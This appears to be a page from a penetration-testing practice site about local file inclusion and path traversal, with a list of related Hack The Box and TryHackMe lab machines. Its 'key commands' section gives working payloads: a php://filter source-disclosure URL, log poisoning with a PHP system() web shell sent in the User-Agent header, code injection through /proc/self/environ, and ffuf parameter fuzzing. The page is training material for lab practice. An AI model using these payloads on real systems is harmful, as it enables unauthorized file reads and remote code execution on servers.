ZeroBox

LFI and Path Traversal: practice machines and key commands

Local file inclusion and path traversal let you read, and sometimes execute, files the web server can access. Probe file parameters with ../ sequences, encoded variants and absolute paths, then read /etc/passwd, application source and configuration files to find secrets. In PHP, filter wrappers such as php://filter return source code in base64, which exposes database credentials. To turn a read into code execution, poison a log file or session you can include, abuse /proc/self/environ, or combine it with an upload. Remote file inclusion works only when the server fetches remote URLs, which modern defaults block. Windows targets need backslash and drive-letter variations. Keep notes on which files you can read, because the web root layout often reveals the next step. These boxes use inclusion bugs as the way in.

Key commands

Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.

PHP Filter Base64 LFI Wrapper

Read source code of PHP scripts through base64 conversion filter.

http://{TARGET_IP}/index.php?page=php://filter/convert.base64-encode/resource=config.php

LFI Log Poisoning via User-Agent

Inject PHP execution payload into web server access log, then include via LFI.

curl -s -A "<?php system(\$_GET['cmd']); ?>" http://{TARGET_IP}/ && curl "http://{TARGET_IP}/index.php?page=/var/log/apache2/access.log&cmd=id"

LFI to RCE via Apache /proc/self/environ

Inject User-Agent payload into environment file for code execution.

curl -s -H "User-Agent: <?php system('id'); ?>" "http://{TARGET_IP}/view.php?file=/proc/self/environ"

ffuf Parameter Discovery (GET/POST)

Fuzz hidden query parameters on target page.

ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u "http://{TARGET_IP}/index.php?FUZZ=test" -ac

Keep going

LFI and Path Traversal machines (26)

2 of these are machines I solved myself and are listed first within each difficulty. Machines are matched by their technique tags. 23 Linux, 3 Windows.

Very Easy (1)

MachinePlatformOSTags
IncludedHTBLinuxTFTP, LFI, Local File Inclusion

Easy (8)

MachinePlatformOSTags
Lo-FiTHMLinuxLFI, Local-File-Inclusion
ResponderHTBWindowsLFI, WinRM, Responder
AlertHTBLinuxCPTS, Markdown XSS, LFI, Port Forwarding
BackdoorHTBLinuxDirectory-traversal, HTB
InclusionTHMLinuxLFI, Sudo
MailingHTBWindowsCPTS, Email, Directory Traversal, LibreOffice
OpenSourceHTBLinuxDirectory-Traversal, HTB, Network-Pivoting, Unrestricted-File-Upload
SkynetTHMLinuxOSCP, Samba, SquirrelMail, Cuppa CMS

Medium (12)

MachinePlatformOSTags
AgileHTBLinuxCPTS, LFI, Werkzeug PIN, Chrome Debugging
ArchangelTHMLinuxLFI, Log-Poisoning, Cron, Path-Hijacking
BagelHTBLinuxCPTS, LFI, Spring Boot, .NET Deserialization
BartHTBWindowsEnumerating-subdomains, HTB, Log-poisoning, combinations
DogcatTHMLinuxLFI, Log-Poisoning, Docker-Escape
EncodingHTBLinuxCPTS, LFI, PHP Filters, Git Hooks
FormatHTBLinuxCPTS, LFI, Nginx Traversal, Redis
NinevehHTBLinuxChaining-exploits, HTB, HTTP, Local-file-inclusion
TeamTHMLinuxLFI, Bash-Scripting, Wildcards
WatcherTHMLinuxLFI, FTP, Cron, Sudo-Privesc
WriterHTBLinuxHTB, Local-File-Inclusion, Virtual-Host
ZippingHTBLinuxZip-Symlink, LFI, SQLi, Shared-Library-Hijack

Hard (3)

MachinePlatformOSTags
MonitorsHTBLinuxCVE-2020-9496, Exploit-modification, HTB, Java-Deserialization
PikabooHTBLinux"Off, HTB, Local-File-Inclusion, Perl-function-injection
TartarusTHMLinuxFTP, Directory-Traversal, Cron, Sudo-Privesc

Insane (2)

MachinePlatformOSTags
FattyHTBLinuxDeserialization, HTB, Path-Traversal, SQL-Injection
ResponseHTBLinuxAuthentication-Bypass, Directory-Traversal, HTB, SSRF-using-HTTP-long

Related techniques

Practise it, then track it. Log every box and the commands you used in ZeroBox. Open ZeroBox